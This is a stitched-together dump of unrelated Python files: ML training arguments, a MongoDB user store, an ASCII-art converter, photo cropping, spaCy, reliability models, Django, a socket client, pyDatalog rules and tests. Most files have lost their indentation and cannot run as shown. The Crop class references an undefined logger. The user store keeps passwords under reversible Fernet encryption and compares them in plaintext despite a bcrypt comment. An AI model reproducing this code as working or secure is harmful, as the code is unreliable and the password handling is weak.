"cluster_node,run_notes,run_name," \
"log_interval,save_interval"
parse_args = parse_args.split(",")
for parse_arg in parse_args:
parser.add_argument(parse_arg)
args = parser.parse_args()
pop_size = int(args.pop_size)
n_generations = int(args.n_generations)
n_agents = int(args.n_agents)
n_timesteps = int(args.n_timesteps)
mut_tile_size = int(args.mut_tile_size)
mut_tile_no = int(args.mut_tile_no)
run_notes = args.run_notes
run_name = args.run_name
cluster_node = args.cluster_node
log_interval = int(args.log_interval)
save_interval = int(args.save_interval)
using_wandb = True
GARuck.train(pop_size, n_generations, n_agents,
n_timesteps, mut_tile_size, mut_tile_no,
using_wandb, log_interval, save_interval,
cluster_node,
run_notes, run_name)
# pop_size,n_generations,n_agents,n_timesteps,mut_tile_size,mut_tile_no
# cluster_node,run_notes,run_name
# log_interval,save_interval
# python3 ga_train.py 64 100 5 500 4 1 -1 "Test" "" 10 10  (the last two are example log_interval/save_interval values)
|
def pesho():
print('Pesho')
print('Gosho')
pesho()
|
from collections import namedtuple
from pymongo import MongoClient
from cryptography.fernet import Fernet
from karura.env import get_database_uri, get_private_key, kintoneEnv
class DatabaseAPI():
USER_COLLECTION = "karura_user"
def __init__(self, database_uri="", alternative_db=""):
self.database_uri = database_uri if database_uri else get_database_uri()
self._alternative_db = alternative_db
self._database = None
self.__client = None
def connect(self):
self._get_database()
def _get_database(self):
if self._database is not None:
return self._database
else:
self.__client = MongoClient(self.database_uri, serverSelectionTimeoutMS=2)
db = self.__client.get_default_database()
if self._alternative_db:
db = self.__client[self._alternative_db]
if not db:
raise Exception("Cannot connect to the database. Please configure database_uri.")
self._database = db
return self._database
def __authentication_parameter_check(self, domain, user, password):
        if not domain:
            raise Exception("domain is not specified when registering the user.")
        if not user:
            raise Exception("user is not specified when registering the user.")
        if not password:
            raise Exception("password is not specified when registering the user.")
if "@" in user:
raise Exception("user name with '@' is not allowed")
# see ref: login security on cybozu
# https://help.cybozu.com/ja/general/admin/passwordpolicy.html
if len(user) <= 3:
raise Exception("user's string length is too short.")
if len(password) <= 3:
raise Exception("password's string length is too short.")
elif len(password) > 72:
raise Exception("password's string length is too long.") # for bcrypt
return True
def __encrypt(self, secret_str):
key = get_private_key()
f = Fernet(key)
encoded = f.encrypt(secret_str.encode("utf-8"))
return encoded
def __decrypt(self, encoded_str):
key = get_private_key()
f = Fernet(key)
decoded = f.decrypt(encoded_str)
return decoded.decode("utf-8")
def __make_user_key(self, domain, user):
return user + "@" + domain
@classmethod
def key_split(cls, key):
user, domain = key.rsplit("@")
return user, domain
@classmethod
def key_to_dict(cls, key):
user, domain = cls.key_split(key)
return {"user": user, "domain": domain}
def register_user(self, domain, user, password):
self.__authentication_parameter_check(domain, user, password)
db = self._get_database()
user_db = db[self.USER_COLLECTION]
key = self.__make_user_key(domain, user)
if user_db.find_one({"key": key}) is not None:
raise Exception("The user already exist.")
password = self.__encrypt(password)
result = user_db.insert_one({"key": key, "password": password, "domain": domain})
if result and result.inserted_id:
return user_db.find_one({"_id": result.inserted_id})
else:
raise Exception("Could not register the user.")
def authenticate_user(self, domain, user, password):
self.__authentication_parameter_check(domain, user, password)
db = self._get_database()
user_db = db[self.USER_COLLECTION]
key = self.__make_user_key(domain, user)
registered = user_db.find_one({"key": key})
if registered is not None and password == self.__decrypt(registered["password"]):
return registered
else:
raise Exception("Authentication of user failed.")
def delete_user(self, domain, user, password):
registered = self.authenticate_user(domain, user, password)
if not registered:
raise Exception("Faild to delete the user.")
else:
db = self._get_database()
user_db = db[self.USER_COLLECTION]
result = user_db.delete_one({"_id": registered["_id"]})
return result.deleted_count == 1
def change_user_password(self, domain, user, old_password, new_password):
self.__authentication_parameter_check(domain, user, old_password)
self.__authentication_parameter_check(domain, user, new_password)
if old_password == new_password:
raise Exception("old_password and new_password is same.")
registered = self.authenticate_user(domain, user, old_password)
result = False
if registered is not None:
db = self._get_database()
user_db = db[self.USER_COLLECTION]
_new_password = self.__encrypt(new_password)
result = user_db.update_one({"_id": registered["_id"]}, {"$set": {"password": _new_password}})
result = (result.modified_count == 1)
if not result:
raise Exception("Change password is failed")
def get_kintone_env(self, domain):
try:
db = self._get_database()
user_db = db[self.USER_COLLECTION]
registered = user_db.find_one({"domain": domain})
if not registered:
return None
user, domain = self.key_split(registered["key"])
env = kintoneEnv(domain, user, self.__decrypt(registered["password"]))
return env
except Exception as ex:
return None
def close(self, with_drop=False):
if self._database is not None:
if with_drop:
self.__client.drop_database(self._database.name)
self.__client.close()
            self._database = None
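# Minimal usage sketch (assumes a reachable MongoDB behind get_database_uri() and a
# Fernet key from get_private_key(); all values here are placeholders):
#   api = DatabaseAPI("mongodb://localhost:27017/karura")
#   api.connect()
#   api.register_user("example.cybozu.com", "alice", "secret-password")
#   env = api.get_kintone_env("example.cybozu.com")
#   api.close()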
|
import argparse
import os
from PIL import Image, ImageDraw, ImageFont
CHARS = [chr(i) for i in range(32, 127)]
def main():
args = parse_args()
    # expand '~' explicitly; truetype() does not perform tilde expansion
    fnt = ImageFont.truetype(os.path.expanduser('~/Library/Fonts/Hack Bold Nerd Font Complete.ttf'), args.font_size)
font_w, font_h = get_font_size(args.font_size, fnt)
char_density = generate_char_density(fnt, (font_w, font_h))
regions = get_regions(args.image, font_w, font_h)
map_regions_to_chars(char_density, regions)
def map_regions_to_chars(char_density, regions):
char_density_list = sorted(char_density.items(), key=lambda x: x[1])
max_char_density = char_density_list[-1][1]
max_region_density = 0
for i in range(len(regions)):
for j in range(len(regions[i])):
regions[i][j] = sum(map(sum, regions[i][j].getdata()))
max_region_density = max(max_region_density, regions[i][j])
density_scale = max_char_density / max_region_density
output = []
for r_density in regions:
for r_d in r_density:
output.append(find_closest_char(char_density_list, r_d, density_scale))
output.append('\n')
print(''.join(output))
def find_closest_char(char_density_list, density, density_scale):
target_density = density * density_scale
char = min(char_density_list, key=lambda x: abs(x[1]-target_density))
return char[0]
def get_regions(image, font_w, font_h):
with Image.open(image) as im:
im = im.convert('LA')
img_w, img_h = im.size
new_img = Image.new('RGB', im.size)
h = 0
w = 0
regions = []
        while h <= img_h:
region_list = []
regions.append(region_list)
while w <= img_w:
region = im.crop((w, h, w+font_w, h+font_h))
region_list.append(region)
w += font_w
w = 0
h += font_h
return regions
def generate_char_density(fnt, size):
char_density = {}
for c in CHARS:
img = Image.new('RGB', size, color='white')
d = ImageDraw.Draw(img)
d.text((0, 0), c, font=fnt, fill='black')
char_density[c] = sum(map(sum, img.getdata()))
return char_density
def get_font_size(font_size, fnt):
d = ImageDraw.Draw(Image.new('RGB', (font_size, font_size)))
sizes = [d.textsize(c, font=fnt) for c in CHARS]
max_w = max(sizes, key=lambda s: s[0])[0]
max_h = max(sizes, key=lambda s: s[1])[1]
return (max_w, max_h)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('image', help='Image file to turn into ASCII')
parser.add_argument('--font-size', default=15, type=int, help='Font size')
return parser.parse_args()
if __name__ == '__main__':
main()
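# Example invocation (script and image names are placeholders):
#   python3 this_script.py photo.jpg --font-size 12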
|
# -*- coding: utf-8 -*-
# from trimming import Trimming
from photo import Photo
# from ssdnet import MultiBoxEncoder, SSD300, SSD512, SSD300_v2, SSD512_v2, preproc_for_test
# from common.logger import get_task_logger
from datetime import datetime
from PIL import Image
import numpy as np
import sys
import os
import time
# logger = get_task_logger("trimming")
class Crop():
"""
検出オブジェクトをCropした画像を取得するクラス
"""
def __init__(self, options):
self.options = options
        # load the SSD models
# self.models = self.load_ssdmodel()
self.n_skip = 0
self.n_data = 0
        # self.ssd_parts_scores = {} # dummy: kept to match the latest implementation
def detect_for(self, clsname):
"""
予め全モデルで予測を行い、
clsnameで指定されたオブジェクトのみを出力する。
"""
# if (photo):
# self.photo = photo
# if (roicls):
        #     # restrict to one of the human-body parts given by roicls
# roiobjs = []
# roi_bboxes = self.predict_by("body").get(roicls, [])
# for roi_bbox in roi_bboxes:
# roiobjs.append(roi_bbox)
# else:
        #     # use the whole photo as the ROI; roi=None means self.photo is treated as the original image
# roiobjs = [None]
roiobjs = [None]
allobjs = {}
for roi in roiobjs:
            # detect per ROI
roidicts = {}
for mdl in self.get_modelinfo():
                # detect per model (bboxes are output in the original image's coordinate system)
objs = self.predict_by(mdl["name"], roi=roi)
roidicts.update(objs)
            # merge the detection results from all ROIs per class
for k, v in roidicts.items():
if not (k in allobjs):
allobjs[k] = v
else:
allobjs[k] += v
        # return the bboxes of the class given by clsname
return allobjs.get(clsname, [])
def detect_for2(self, clsname, roicls=None, photo=None, outroi=False):
"""
予め全モデルで予測を行い、
clsnameで指定されたオブジェクトのみを出力する。
"""
if (photo):
self.photo = photo
if (roicls):
            # restrict to one of the human-body parts given by roicls
roiobjs = self.predict_by("body").get(roicls, [])
else:
            # use the whole photo as the ROI; roi=None means self.photo is treated as the original image
roiobjs = [None]
allobjs, outrois = [], []
for roi in roiobjs:
            # detect per ROI
roidicts = {}
for mdl in self.get_modelinfo():
                # detect per model (bboxes are output in the original image's coordinate system)
objs = self.predict_by(mdl["name"], roi=roi)
roidicts.update(objs)
if ((clsname in objs) and (len(objs[clsname]) > 0)):
                    # save the source ROI only when objects of the target class exist
outrois.append(roi)
                    # store a list per ROI, in case several target objects for clsname are extracted from the same roi
allobjs.append(objs[clsname])
if (outroi):
            # return the bboxes of the class given by clsname together with their ROI regions
return allobjs, outrois
else:
            # return the bboxes of the class given by clsname
return allobjs
def crop_image(self, img, bbox, allow_zero=False):
x, y, w, h = bbox
if (not allow_zero) and ((x <= 0) or (y <= 0)):
return None
elif (allow_zero) and ((x < 0) or (y < 0)):
return None
croped_img = self.cut_rect(img, *bbox)
if (self.options["pil"]):
            croped_img = self.cv2pil(croped_img) # convert to PIL format
return croped_img
def crop_images(self, img, bboxes):
"""
bboxesで指定されたbboxに対応した画像を出力する。
"""
logger.info("+++ [crop_images] start +++")
images = []
for crop_i, bbox in enumerate(bboxes):
_x, _y, _w, _h = bbox
logger.info("[crop_images] bbox: %s, %s, %s, %s" %
(_x, _y, _w, _h))
croped_img = self.crop_image(img, bbox)
if (croped_img is None):
logger.info("[crop_images] <skip> invalid bbox:", bbox)
continue
images.append((crop_i, croped_img))
logger.info("--- [crop_images] end ---")
return images
def saveimgs(self, images, img_fpath, odir):
"""
img_fpathから抽出したimagesをodirに保存する
"""
for i, (crop_i, img) in enumerate(images):
fpath, ext = os.path.splitext(img_fpath)
bn = os.path.basename(fpath)
fn = "%s_%d%s" % (bn, i+1, ext)
if not (os.path.exists(odir)):
os.makedirs(odir)
self.saveimg(img, odir, fn)
def save_crop_images(self, img_fpath):
        # load the photo
        degree = 0 # do not rotate
self.photo = Photo(img_fpath, 0, 0, {"rotate": degree})
bboxes = self.detect_for(self.options["class"])
if (self.options["n"] and (len(bboxes) > self.options["n"])):
            # exclude photos that are not of a single person
self.n_skip += 1
print("x [skip] #heads = %d: %s" % (len(bboxes), img_fpath))
return
        # generate images only when a modified image exists
bn = os.path.basename(img_fpath)
mod_fpath = None
if (self.options["mod"]):
mod_fpath = os.path.join(self.options["mod"], bn)
if not (os.path.isfile(mod_fpath)):
self.n_skip += 1
print("x [skip] %s does not exists..." % (mod_fpath))
return
self.n_data += 1
        # extract face images from the original image (with reflection)
images = self.crop_images(self.photo.src, bboxes)
if (mod_fpath):
# modified画像(反射あり)から顔画像抽出
modimg = self.read_image(mod_fpath)
mh, mw = modimg.shape[:2]
if ((self.photo.w != mw) or (self.photo.h != mh)):
print("x [Error] no same file-size pair: %s " % (mod_fpath))
return
mod_images = self.crop_images(modimg, bboxes)
# resize
if (self.options["shape"]):
h, w = self.options["shape"].split("x")
if not (h.isdigit() and w.isdigit()):
print(
"[Error] no digits for --shape option. needs HEIGHTxWIDTH format...")
return
            # resize while keeping the aspect ratio, padding the leftover area
images = self.resize_images(images, (int(h), int(w)),
pad=self.options["pad"], blur=self.options["blur"],
aspect=self.options["pad"])
if (mod_fpath):
mod_images = self.resize_images(mod_images, (int(h), int(w)),
pad=self.options["pad"], blur=self.options["blur"],
aspect=self.options["pad"])
        # write the before/after images to files, one per detected object
self.saveimgs(images, img_fpath, self.options["output_org"])
if (mod_fpath):
self.saveimgs(mod_images, mod_fpath, self.options["output_mod"])
def run(self):
"""
バッチメイン
"""
print("options:", end=' ')
print(self.options)
images = self.options["org"]
if (os.path.isfile(images)):
            # when a single file is given
images = [images]
elif (os.path.isdir(images)):
# ディレクトリ指定の場合
images = self.get_files(
images, ext=[".jpg", ".jpeg", ".png", ".gif"])
for i, img_fpath in enumerate(images):
if (os.path.isfile(img_fpath)):
print("[%d] %s" % (i, img_fpath))
self.save_crop_images(img_fpath)
else:
print("[%d] <SKIP> no file: %s" % (i, img_fpath))
print("#n_data: %d, #n_skip: %d" % (self.n_data, self.n_skip))
|
import spacy
from spacy.language import Language
# Define the custom component
@Language.component("length_component")
def length_component_function(doc):
    # Compute the length of the document
    doc_length = len(doc)
    print(f"This document is {doc_length} tokens long.")
    # Return the doc
    return doc
# Load the small German pipeline
nlp = spacy.load("de_core_news_sm")
# Add the component first in the pipeline and print the component names
nlp.add_pipe("length_component", first=True)
print(nlp.pipe_names)
# Process a text (the sentence is just a sample; any German text works here)
doc = nlp("Das ist ein Satz.")
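# Expected behavior: the component runs first, so the token count is printed before
# any other pipeline component, and "length_component" leads nlp.pipe_names.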
|
# Copyright 2020, Battelle Energy Alliance, LLC
# ALL RIGHTS RESERVED
"""
Created on May 1 2020
@author: mandd,wangc
"""
#External Modules------------------------------------------------------------------------------------
import numpy as np
import numpy.ma as ma
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from utils import mathUtils as utils
from utils import InputData, InputTypes
from .MaintenanceBase import MaintenanceBase
#Internal Modules End--------------------------------------------------------------------------------
class PMModel(MaintenanceBase):
"""
Basic reference for Preventive Maintenance (PM) modeling
Reference:
    D. Kancev, M. Cepin,
Evaluation of risk and cost using an age-dependent unavailability modelling of test and maintenance for standby components
Journal of Loss Prevention in the Process Industries 24 (2011) pp. 146-155.
"""
@classmethod
def getInputSpecification(cls):
"""
Collects input specifications for this class.
@ In, cls, class instance
@ Out, inputSpecs, InputData, specs
"""
typeEnum = InputTypes.makeEnumType('PMType', 'PMTypeType', ['standby','operating'])
inputSpecs = super(PMModel, cls).getInputSpecification()
inputSpecs.description = r"""
Preventive maintenance reliability models
"""
inputSpecs.addSub(InputData.parameterInputFactory('type', contentType=typeEnum, descr='Type of SSC considered: stand-by or operating'))
inputSpecs.addSub(InputData.parameterInputFactory('rho', contentType=InputTypes.InterpretedListType, descr='Failure probability on demand'))
inputSpecs.addSub(InputData.parameterInputFactory('Tpm', contentType=InputTypes.InterpretedListType, descr='Time required to perform PM activities'))
inputSpecs.addSub(InputData.parameterInputFactory('Tr', contentType=InputTypes.InterpretedListType, descr='Average repair time'))
inputSpecs.addSub(InputData.parameterInputFactory('Tt', contentType=InputTypes.InterpretedListType, descr='Average test duration'))
inputSpecs.addSub(InputData.parameterInputFactory('Lambda',contentType=InputTypes.InterpretedListType, descr='Component failure rate'))
inputSpecs.addSub(InputData.parameterInputFactory('Tm', contentType=InputTypes.InterpretedListType, descr='Preventive maintenance interval'))
inputSpecs.addSub(InputData.parameterInputFactory('Ti', contentType=InputTypes.InterpretedListType, descr='Surveillance test interval'))
return inputSpecs
def __init__(self):
"""
Constructor
@ In, None
@ Out, None
"""
super().__init__()
# Component type
self.type = None
self.rho = None
self.Tpm = None
self.Tr = None
self.Tt = None
self.Lambda = None
self.Tm = None
self.Ti = None
def _handleInput(self, paramInput):
"""
Function to read the portion of the parsed xml input that belongs to this specialized class
and initialize some stuff based on the inputs got
@ In, paramInput, InputData.ParameterInput, the parsed xml input
@ Out, None
"""
super()._handleInput(paramInput)
for child in paramInput.subparts:
      if child.getName().lower() == 'type':
        self.type = child.value
      elif child.getName().lower() == 'rho':
        self.setVariable('rho', child.value)
      elif child.getName().lower() == 'tpm':
        self.setVariable('Tpm', child.value)
      elif child.getName().lower() == 'tr':
        self.setVariable('Tr', child.value)
      elif child.getName().lower() == 'tt':
        self.setVariable('Tt', child.value)
      elif child.getName().lower() == 'lambda':
        self.setVariable('Lambda', child.value)
      elif child.getName().lower() == 'tm':
        self.setVariable('Tm', child.value)
      elif child.getName().lower() == 'ti':
        self.setVariable('Ti', child.value)
def initialize(self, inputDict):
"""
Method to initialize this plugin
@ In, inputDict, dict, dictionary of inputs
@ Out, None
"""
super().initialize(inputDict)
def _availabilityFunction(self, inputDict):
"""
Method to calculate component availability
@ In, inputDict, dict, dictionary of inputs
@ Out, availability, float, component availability
"""
if self.type == 'standby':
availability = 1.0 - self.standbyModel(self.rho, self.Ti, self.Tr, self.Tt, self.Tpm, self.Tm, self.Lambda)
else:
availability = 1.0 - self.operatingModel(self.Tr, self.Tpm, self.Tm, self.Lambda)
return availability
def _unavailabilityFunction(self, inputDict):
"""
Method to calculate component unavailability
@ In, inputDict, dict, dictionary of inputs
      @ Out, unavailability, float, component unavailability
"""
if self.type == 'standby':
unavailability = self.standbyModel(self.rho, self.Ti, self.Tr, self.Tt, self.Tpm, self.Tm, self.Lambda)
else:
unavailability = self.operatingModel(self.Tr, self.Tpm, self.Tm, self.Lambda)
return unavailability
def standbyModel(self, rho, Ti, Tr, Tt, Tpm, Tm, lamb):
"""
Method to calculate unavailability for a component in a stand-by configuration
@ In, rho, float, failure probability per demand
@ In, Ti, float, surveillance test interval
@ In, Tr, float, mean time to repair
@ In, Tt, float, test duration
@ In, Tpm, float, mean time to perform preventive maintenance
@ In, Tm, float, preventive maintenance interval
@ In, lamb,float, component failure rate
@ Out, unavailability, float, component unavailability
"""
u = rho + 0.5*lamb*Ti + Tt/Ti + (rho+lamb*Ti)*Tr/Ti + Tpm/Tm
return u
def operatingModel(self, Tr, Tpm, Tm, lamb):
"""
      Method to calculate unavailability for a component which is continuously operating
@ In, Tr, float, mean time to repair
@ In, Tpm, float, mean time to perform preventive maintenance
@ In, Tm, float, preventive maintenance interval
@ In, lamb,float, component failure rate
@ Out, unavailability, float, component unavailability
"""
u = lamb*Tr/(1.0+lamb*Tr) + Tpm/Tm
return u
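# A minimal numeric sketch (illustrative only, not part of the plugin API):
# evaluating the two unavailability formulas above directly. Every parameter
# value below is a hypothetical placeholder chosen only to show the arithmetic.
if __name__ == '__main__':
  rho, Ti, Tr, Tt, Tpm, Tm, lamb = 1.e-3, 720., 24., 2., 8., 8760., 1.e-5
  uStandby = rho + 0.5*lamb*Ti + Tt/Ti + (rho + lamb*Ti)*Tr/Ti + Tpm/Tm
  uOperating = lamb*Tr/(1.0 + lamb*Tr) + Tpm/Tm
  print('standby unavailability  : %.4e' % uStandby)
  print('operating unavailability: %.4e' % uOperating)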
|
from django.contrib import admin
from .models import Employees
admin.site.register(Employees)
|
import socket
import select
import sys
import numpy as np
import time
from capnctrl import cap, ctrl
HEADER_LENGTH = 10
IP = ""
PORT = 1234
my_username = 'tutor'
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((IP, PORT))
client_socket.setblocking(False)
username = my_username.encode('utf-8')
username_header = f"{len(username):<{HEADER_LENGTH}}".encode('utf-8')
client_socket.send(username_header + username)
my_username2 = 'netStart'
client_socket2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket2.connect((IP, PORT))
client_socket2.setblocking(False)
username2 = my_username2.encode('utf-8')
username_header2 = f"{len(username2):<{HEADER_LENGTH}}".encode('utf-8')
client_socket2.send(username_header2 + username2)
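# Wire format used throughout this script: each message is prefixed with a
# fixed-width (HEADER_LENGTH characters) ASCII length field, so a receiver can
# read exactly HEADER_LENGTH bytes, parse the length, then read the payload.
# A small helper sketch of that pattern (the loop below inlines it instead):
def send_framed(sock, text):
    payload = text.encode('utf-8')
    header = f"{len(payload):<{HEADER_LENGTH}}".encode('utf-8')
    sock.send(header + payload)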
steering = 0
target = 0
m2s = {'a':-0.1, 'd':0.1}
training = False
key = 'f'
message = "True"
while True:
key = cap.keyboard()
"""
try:
# receive things
username_header = client_socket.recv(HEADER_LENGTH)
if not len(username_header):
print("connection closed by the server")
sys.exit()
username_length = int(username_header.decode('utf-8'))
username = client_socket.recv(username_length).decode('utf-8')
if username == 'SERVER':
message_header = client_socket.recv(HEADER_LENGTH)
message_length = int(message_header.decode('utf-8'))
message = client_socket.recv(message_length).decode('utf-8')
except :
pass
"""
for i in range(len(key)):
try:
if key[i] == 'q':
target = target * 0.6
training = True
elif key[i] == 'e':
"""
if training:
out_message = 'net'.encode('utf-8')
out_message_header = f"{len(out_message):<{HEADER_LENGTH}}".encode('utf-8')
client_socket.send(out_message_header + out_message)
"""
target = 0
training = False
else:
#training = True
target = target + m2s[key[i]]
except:
pass
    target = np.clip(target, -0.5, 0.5)
    steering = 0.8*steering + 0.2*target
    steering = np.clip(steering, -0.5, 0.5)
    if training:
        # While training, send the steering value over the 'tutor' connection
        out_message = str(steering).encode('utf-8')
        out_message_header = f"{len(out_message):<{HEADER_LENGTH}}".encode('utf-8')
        client_socket.send(out_message_header + out_message)
        time.sleep(0.1)
    else:
        # Otherwise send it over the 'netStart' connection
        out_message = str(steering).encode('utf-8')
        out_message_header = f"{len(out_message):<{HEADER_LENGTH}}".encode('utf-8')
        client_socket2.send(out_message_header + out_message)
        time.sleep(0.1)
|
import sys
def main():
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
test = test.strip()
        if len(test) == 0:
            continue
wines = test.split('|')[0].strip().split(' ')
letters = list(test.split('|')[1].strip().lower())
result = []
        for wine in wines:
            original = wine
            # work on a lowercased copy so the removal below is case-insensitive
            # and repeated letters are matched against distinct characters
            remaining = wine.lower()
            match = True
            for letter in letters:
                if letter not in remaining:
                    match = False
                    break
                remaining = remaining.replace(letter, '', 1)
            if match:
                result.append(original)
print('False' if len(result) == 0 else ' '.join(result))
test_cases.close()
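# An equivalent multiset-containment check, sketched with collections.Counter:
# a wine matches when, for every requested letter, the wine (case-insensitive)
# contains at least as many occurrences of that letter as requested.
def matches(wine, letters):
    from collections import Counter
    need = Counter(letters)
    have = Counter(wine.lower())
    return all(have[c] >= n for c, n in need.items())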
if __name__ == '__main__':
main()
|
from django.db import models
class Feedback(models.Model):
    name = models.CharField(max_length=100, blank=False)
    phone_no = models.CharField(max_length=100, blank=False, default=' ')
    message = models.TextField(max_length=2000)
    mail = models.EmailField(max_length=254)
def __str__(self):
return self.name
|
from pyDatalog import pyDatalog
from reg import *
pyDatalog.create_terms('X, Y, Z')
pyDatalog.create_terms('match_none')
pyDatalog.create_terms('datapath')
pyDatalog.create_terms('in_port')
pyDatalog.create_terms('reg_src')
pyDatalog.create_terms('reg_dst')
pyDatalog.create_terms('reg_outport')
pyDatalog.create_terms('reg_flag')
pyDatalog.create_terms('reg_2')
pyDatalog.create_terms('reg_3')
pyDatalog.create_terms('reg_4')
pyDatalog.create_terms('reg_5')
pyDatalog.create_terms('reg_6')
pyDatalog.create_terms('reg_7')
pyDatalog.create_terms('reg_8')
pyDatalog.create_terms('reg_9')
pyDatalog.create_terms('reg_10')
pyDatalog.create_terms('reg_11')
pyDatalog.create_terms('ip_proto')
pyDatalog.create_terms('ip_dst, ip_src')
pyDatalog.create_terms('ip_dst_prefix, ip_src_prefix')
pyDatalog.create_terms('ip_ttl')
pyDatalog.create_terms('eth_dst')
pyDatalog.create_terms('arp_proto')
pyDatalog.create_terms('arp_tpa')
pyDatalog.create_terms('arp_op')
pyDatalog.create_terms('icmp_proto, icmp_type, icmp_code')
def init_match_clause():
match_none(X) <= (X == [(NONE_IDX, )])
datapath(X, Y) <= (Y == [(REG_DP_IDX, X)])
in_port(X, Y) <= (Y == [(IN_PORT_IDX, X)])
reg_2(X, Y) <= (Y == [(REG2_IDX, X)])
reg_3(X, Y) <= (Y == [(REG3_IDX, X)])
reg_4(X, Y) <= (Y == [(REG4_IDX, X)])
reg_5(X, Y) <= (Y == [(REG5_IDX, X)])
reg_6(X, Y) <= (Y == [(REG6_IDX, X)])
reg_7(X, Y) <= (Y == [(REG7_IDX, X)])
reg_8(X, Y) <= (Y == [(REG8_IDX, X)])
reg_9(X, Y) <= (Y == [(REG9_IDX, X)])
reg_10(X, Y) <= (Y == [(REG10_IDX, X)])
reg_src(X, Y) <= (Y == [(REG_SRC_IDX, X)])
reg_dst(X, Y) <= (Y == [(REG_DST_IDX, X)])
reg_outport(X, Y) <= (Y == [(REG_OUTPORT_IDX, X)])
reg_flag(X, Y) <= (Y == [(REG_FLAG_IDX, X)])
ip_proto(X) <= (X == [(IP_PROTO_IDX, )])
ip_dst(X, Y) <= (Y == [(IP_DST_IDX, X)])
ip_src(X, Y) <= (Y == [(IP_SRC_IDX, X)])
    ip_dst_prefix(X, Y, Z) <= (Z == [(IP_DST_IDX, X, Y)])
    ip_src_prefix(X, Y, Z) <= (Z == [(IP_SRC_IDX, X, Y)])
ip_ttl(X, Y) <= (Y == [(IP_TTL_IDX, X)])
eth_dst(X, Y) <= (Y == [(ETH_DST_IDX, X)])
arp_proto(X) <= (X == [(ARP_PROTO_IDX, )])
arp_tpa(X, Y) <= (Y == [(ARP_TPA_IDX, X)])
arp_op(X, Y) <= (Y == [(ARP_OP_IDX, X)])
icmp_proto(X) <= (X == [(ICMP_PROTO_IDX, )])
icmp_type(X, Y) <= (Y == [(ICMP_TYPE_IDX, X)])
icmp_code(X, Y) <= (Y == [(ICMP_CODE_IDX, X)])
def convert_flags(flags):
    # Each flag is a single bit: e.g. flag = 1 occupies the first bit and
    # flag = 4 occupies the third bit; summing them ORs the bits together,
    # and the result is rendered as a value/mask pair.
sumflag = sum(flags)
return '{}/{}'.format(sumflag, sumflag)
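# For example, convert_flags([1, 4]) returns '5/5': bits one and three are set
# in both the value and the mask.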
def convert_tuple2match(match_tuple):
opcode_array = []
prev_flags = []
for match_exp in match_tuple:
match_type = match_exp[0]
if len(match_exp) >= 2:
match_parameter1 = match_exp[1]
if match_type == REG_FLAG_IDX:
# REG_FLAG_IDX match should get at least one parameter
prev_flags.append(match_parameter1)
# we change match_parameter1 here,
# and the below code will consume it
match_parameter1 = convert_flags(prev_flags)
exp = REG_MATCH_DICT[match_type]
if len(match_exp) == 2:
exp += '=' + str(match_parameter1)
elif len(match_exp) == 3:
# like ip_dst = xx.xx.xx.xx/16
match_parameter2 = match_exp[2]
exp += '=' + str(match_parameter1) + '/' + str(match_parameter2)
opcode_array.append(exp)
return ','.join(opcode_array)
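# Hypothetical usage sketch (index names come from the reg module): a tuple
# such as ((IP_SRC_IDX, '10.0.0.0', 16), (IN_PORT_IDX, 3)) would render as
# something like 'ip_src=10.0.0.0/16,in_port=3', assuming REG_MATCH_DICT maps
# those indices to the field names 'ip_src' and 'in_port'.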
|
import pytest
from sqlalchemy import select
from aerie import Aerie, DbSession
from aerie.exceptions import NoActiveSessionError
from tests.tables import User
@pytest.mark.asyncio
async def test_session_maintains_stack(db: Aerie) -> None:
async with db.session() as session:
assert len(DbSession.current_session_stack.get()) == 1
assert DbSession.get_current_session() == session
async with db.session() as session2:
assert len(DbSession.current_session_stack.get()) == 2
assert DbSession.get_current_session() == session2
await session.query(User).where(User.id == 1).all()
assert len(DbSession.current_session_stack.get()) == 1
assert len(DbSession.current_session_stack.get()) == 0
with pytest.raises(NoActiveSessionError):
assert DbSession.get_current_session() is None
@pytest.mark.asyncio
async def test_session_executes_selects(db: Aerie) -> None:
async with db.session() as session:
stmt = select(User).where(User.id == 1)
result = await session.execute(stmt)
assert result.scalars().one().name == 'User One'
|
from __future__ import print_function
from sistr.src.cgmlst.msa import msa_mafft, msa_ref_vs_novel, parse_aln_out
def test_parse_aln_out_string():
test_aln_str = """
>1
atgc-
>2
-tgca
>3
atgca
"""
aln_dict = {h:s for h,s in parse_aln_out(test_aln_str)}
assert "1" in aln_dict
assert "2" in aln_dict
assert "3" in aln_dict
assert aln_dict['1'] == 'atgc-'
assert aln_dict['2'] == '-tgca'
assert aln_dict['3'] == 'atgca'
print(aln_dict)
def test_msa_mafft_str():
test_input_str = """
>1
atgc
>2
tgca
>3
atgca
"""
aln_dict = msa_mafft(test_input_str)
assert isinstance(aln_dict, dict)
assert "1" in aln_dict
assert "2" in aln_dict
assert "3" in aln_dict
assert aln_dict['1'] == 'atgc-'
assert aln_dict['2'] == '-tgca'
assert aln_dict['3'] == 'atgca'
print(aln_dict)
def test_msa_ref_vs_novel():
ref_nt = 'atgtgc'
novel_nt = 'atgcatgc'
ref_msa, novel_msa = msa_ref_vs_novel(ref_nt, novel_nt)
assert novel_msa == novel_nt
assert ref_msa == '--atgtgc'
print(ref_nt, novel_nt)
print(ref_msa, novel_msa)
|
# -*- encoding: utf-8 -*-
from pygithub3.services.base import Service, MimeTypeMixin
from .comments import Comments
from .events import Events
from .labels import Labels
from .milestones import Milestones
class Issue(Service, MimeTypeMixin):
""" Consume `Issues API <http://developer.github.com/v3/issues>`_ """
def __init__(self, **config):
self.comments = Comments(**config)
self.events = Events(**config)
self.labels = Labels(**config)
self.milestones = Milestones(**config)
super(Issue, self).__init__(**config)
def list(self, **params):
""" List your issues
:param str filter: 'assigned', 'created', 'mentioned' or 'subscribed'
:param str state: 'open' or 'closed'
:param str labels: List of comma separated Label names. e.g: bug,ui,
@high
:param str sort: 'created', 'updated' or 'comments'
:param str direction: 'asc' or 'desc'
:param datetime since: Date filter (datetime or str in ISO 8601)
:returns: A :doc:`result`
.. warning::
You must be authenticated
"""
request = self.request_builder('issues.list')
return self._get_result(request, **params)
def list_by_repo(self, user=None, repo=None, **params):
""" List issues for a repo
:param str milestone: Milestone ID, 'none' or '*'
:param str state: 'open' or 'closed'
:param str assignee: Username, 'none' or '*'
:param str mentioned: Username
:param str labels: List of comma separated Label names. e.g: bug,ui,
@high
:param str sort: 'created', 'updated' or 'comments'
